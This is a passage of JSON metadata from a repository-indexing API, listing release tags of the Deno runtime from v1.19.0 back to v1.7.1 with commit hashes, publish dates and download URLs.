rl":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"